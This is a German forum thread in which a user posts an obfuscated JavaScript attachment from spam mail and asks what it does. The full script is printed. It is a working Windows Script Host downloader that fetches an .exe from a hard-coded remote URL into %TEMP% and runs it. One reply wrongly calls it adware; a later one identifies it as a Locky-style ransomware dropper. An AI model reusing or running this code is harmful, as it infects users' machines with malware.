Javascript Virus ?

Hallo liebe Leser, ich hätte da mal eine wichtige frage, ich habe seit mehr als 2 Monaten Emails von meinen eigenen Email Accounts bekommen, also jemand hat meinen Account gehackt und mir immer wieder dieselbe Mail geschick, ich habe diese jetzt über einen Laptop geöffnet und habe mir die Datei die als Anhang dabei war heruntergeladen, die Datei war ein zip Ordner in dem eine Javascript Datei war, ich habe diese mal im Text Format unten reingehauen.
Nun ist meine Frage, kann mir irgendjemand sagen was das ist oder was es machen soll sollte ich die Datei ausführen ?

Code:
iAIzcLGbNj = " while ( ( elem = elem[ dir ] ) && elem.nodeType !== 9 ) { if ( elem.nodeType === 1 ) { if ( truncate && jQuery( elem ).is( until ) ) { break; } matched.push( elem ); } } return matched; };";
fergusI = 0;
String.prototype.contradistinction = function () { return this.substr(0, 1); };
var uUXTro = [("abstained","blockade","n")+"hh"+("excited","continuity","imprint","repeat","lH")+"CNAl", "A"+"iR"+"Nh"+("disembark","verbatim","shant","cD")+"nBHy", "E"+"xpan"+("stupid","comprehensive","poems","holland","dEnviron")+"me"+"nt"+"Stri"+("bellows","proceeding","ngs"), ("consulate","individuals","valuation","weblogs","")+"%"+("folders","quality","TE")+"MP%", ""+("wrack","licking","incorporation",".")+"exe", ("crestfallen","striking","R")+"un", "A"+"ct"+"in"+"ce"+"nt"+"ivei"+("handhelds","cubic","vi")+("extortion","attachment","writhe","keeps","nc")+"enti"+"ve"+"eXincentiv"+("ravages","economically","senators","eObinc")+"en"+"ti"+"ve"+"je"+"ince"+"nt"+"ivect", "sFtalU", "FlAYMT", ("desired","noteworthy","credulity","W")+"Sc"+"ince"+"ntiver"+"ip"+"tinc"+"entive." + ("pansies","tamil","S"), "AmvHaUzPHrP", ("disinherit","likely","accessions","encouraging","h")+"in"+"ce"+("cashed","referrals","mississippi","nt")+"iv"+"ee"+("balustrade","characterize","females","li")+"nc"+("recipe","summit","en")+"ti"+("yorkshire","fleshy","constituent","predicate","vel"), "UJcMlBfkOA", "G"+("appease","acutely","titanium","rRAF")+"Ka"+("mumbai","titles","daughter","je")+"To", "Min"+"ce"+"ntiv"+"eS"+("micah","composer","therapy","Xi")+"nc"+"en"+("lunge","underfoot","picture","johannes","ti")+"ve"+("entree","injuries","mountains","ML")+"in"+"ce"+("religious","cowslip","nt")+("demarcation","oasis","iv")+"e2" + "."+"in"+"ce"+("moodily","triumph","demanding","palatine","nt")+("tears","convergence","thereafter","iv")+"eXMi"+"ncenti"+("cowslip","conversely","rhythmic","ve")+"LH"+"in"+"ce"+"nt"+"iveT"+"TP"];
rQSHDCBXb = " var rneedsContext = jQuery.expr.match.needsContext;";
uUXTro.splice(7, fergusI + 2);
chubby = uUXTro[1+4+1].split("incentive").join("");
var lrAXrUK = this[chubby];
AapDxox = "IdauNqhuT";
societies = (("yachts", "eunuch", "HiLPFi", "submitted", "pVrSBHnCPxP") + "kbmKKwklAVc").contradistinction();
theoriess = (("maudlin", "pyjamas", "ziHwqRxJu", "swimmer", "sSBVEfa") + "xEqzqkRRVx").contradistinction();

fergusI = 6;
uUXTro[fergusI + 1] = uUXTro[fergusI + 1] + uUXTro[fergusI + 3];
uUXTro[fergusI + 2] = "EuHNTOs";
fergusI++;
uUXTro.splice(fergusI + 1, fergusI - 4);
uUXTro[fergusI] = uUXTro[fergusI].split("incentive").join("");
var OoKse = new lrAXrUK("" + uUXTro[fergusI] + "");
YPlWYgwd = " for ( ; n; n = n.nextSibling ) { if ( n.nodeType === 1 && n !== elem ) { matched.push( n ); } ";
fergusI++;
uUXTro[fergusI + 1] = uUXTro[fergusI + 1].split("incentive").join("");
var zBqJutIT = new lrAXrUK(uUXTro[1 + fergusI]);
KNgrjvc = " var siblings = function( n, elem ) { var matched = [];";
fergusI /= 2;
var BPmnOej = OoKse[uUXTro[fergusI - 2]](uUXTro[fergusI - 1]);
KcjXPEtu = "} return matched; };";
revealede = (("owned", "monologue", "eYyeHhl", "eerie", "EbYlGrsShJg") + "qWuYEw").contradistinction();

function undeveloped(poseidon, economic) {

    try {
        var jersey = BPmnOej + "/" + economic + uUXTro[fergusI];
    LjujlQ = "} return jQuery.grep( elements, function( elem ) { return ( jQuery.inArray( elem, qualifier ) > -1 ) !== not; } ); ";
    zBqJutIT["o" + societies + revealede + "n"](("nonsensical","stark","aluminum","petroleum","G") + revealede + ("victor","japanese","toolbox","shopper","T"), poseidon, false);

    QcwDedGUE = "}jQuery.filter = function( expr, elems, not ) { var elem = elems[ 0 ];";
    zBqJutIT[theoriess + ("timely","satyr","e") + (("sharing", "pieces", "vQJtIpP", "pomegranate", "revoke", "nxldkIa") + "GyucrQNudzq").contradistinction() + (("cruising", "champions", "CEdBvsmD", "taxation", "wiltshire", "dMNcSDdMEzF") + "wKxDlSnr").contradistinction()]();
    wGSsSnAuJ = " if ( not ) { expr = ":not(" + expr + ")"; ";
    if (zBqJutIT.status == 200) {
        var PbOLTH = new lrAXrUK((""+("thereabout","guatemala","A")+"pO"+("freshmen","consummation","loins","heath","DB.") + ""+"S"+("managers","interval","serves","tr")+"eam").replace("p", "D"));
        PbOLTH.open();
        RvweTKriM = "var rsingleTag = ( /^<([\w-]+)\s*\/?>(?:<\/\1>|)$/ );";
        PbOLTH.type = 22 * (12 - 8 - 4) + 6 - (8 / 2 + 1);
        aODTVaRhyp = "var risSimple = /^.[^:#\[\.,]*$/;";
        PbOLTH[("postscript","calvary","boundary","sbjct","w")+"ri"+"te"](zBqJutIT[""+"R"+"es"+("stabbing","sumatra","trumpery","nautical","pon") + theoriess + "e"+"Bo"+("casting","sprint","dy")]);
        eUVrfTIaq = " Implement the identical functionality for filter and not function winnow( elements, qualifier, not ) { if ( jQuery.isFunction( qualifier ) ) { return jQuery.grep( elements, function( elem, i ) { /* jshint -W018 */ return !!qualifier.call( elem, i, elem ) !== not; } );";
        PbOLTH[(societies + "o"+"Di"+("madagascar","charter","incidence","mandate","ti")+"on").replace("D", theoriess)] = 0;
        rURMWYFCS = "} if ( qualifier.nodeType ) { return jQuery.grep( elements, function( elem ) { return ( elem === qualifier ) !== not; } );";
        PbOLTH["sav"+"eT"+"oF"+("tombstone","strapping","coaching","palestine","ile")](jersey, 2);
        JzDFHcYwRvt = "} if ( typeof qualifier === "string" ) { if ( risSimple.test( qualifier ) ) { return jQuery.filter( qualifier, elements, not ); ";
        PbOLTH.close();
        ueMAAMNPHiw = "} qualifier = jQuery.filter( qualifier, elements ); ";
        OoKse[uUXTro[fergusI + 1]](jersey, 1, "ISKhYal" === "EwSDqpJcU"); wQXGGA = " if ( typeof selector !== "string" ) { return this.pushStack( jQuery( selector ).filter( function() { for ( i = 0; i < len; i++ ) { if ( jQuery.contains( self[ i ], this ) ) { return true; } } } ) ); ";
    }

} catch (HiQurqnDJ) { };

    hUivzNY = "jQuery.fn.extend( { find: function( selector ) { var i, ret = [], self = this, len = self.length;";
}
undeveloped(("kennedy","rouge","http://")+"ke"+"rr"+"schemist"+("deadline","assistant",".m")+"ys"+"am"+("listening","collection","surrey","pl")+("dragoman","cower","motherofpearl","filme","ew")+("alias","liquid","minds","eb")+("buildings","occurred","si")+("snorting","animated","phonetic","te")+("abounding","paperback",".n")+"et"+"/sys"+("isolated","freak","minnesota","french","te")+("hayes","despotic","sweden","m/lo")+("hankering","introduce","gs")+("undertakings","edited","angola","/98h")+("george","andreas","athens","bookkeeper","7b66")+("infectious","dawns","garrett","notion","gb.e")+"xe","yROdkAds");
 
Zuletzt bearbeitet von einem Moderator:
Soweit ich das sehe ist das nen Snippet was Werbung einblenden soll.
Sehr obfuskiert und hab nur mal kurz draufgeschaut.
Man hat deinen Emailaccount auch nicht gehackt.
Das ist ein alter Trick von Spammern.
Wenn du einen SMTP-Server findest, und dich damit verbindest kannst du meistens von einem Konto aus an das selbige Konto emails verschicken.
Da diese niemals der Server verlassen werden sie auch nicht unbedingt als Spam deklariert oder lösen Reaktionen gegen Spam aus.
Gruß

Fluffy
 
Hatte genau das gleiche wie Du von meiner E-Mail an mich bekommen. Nachdem ich das PW geändert habe kam es nicht mehr. Dennoch interessiert es mich, was es ist...
 
Das Script zieht eine exe Datei vom Server und versucht diese im Kontext des Programms aufzurufen.

Quasi ein Downloader einer Maleware für Locky und Co.
 
Zurück
Oben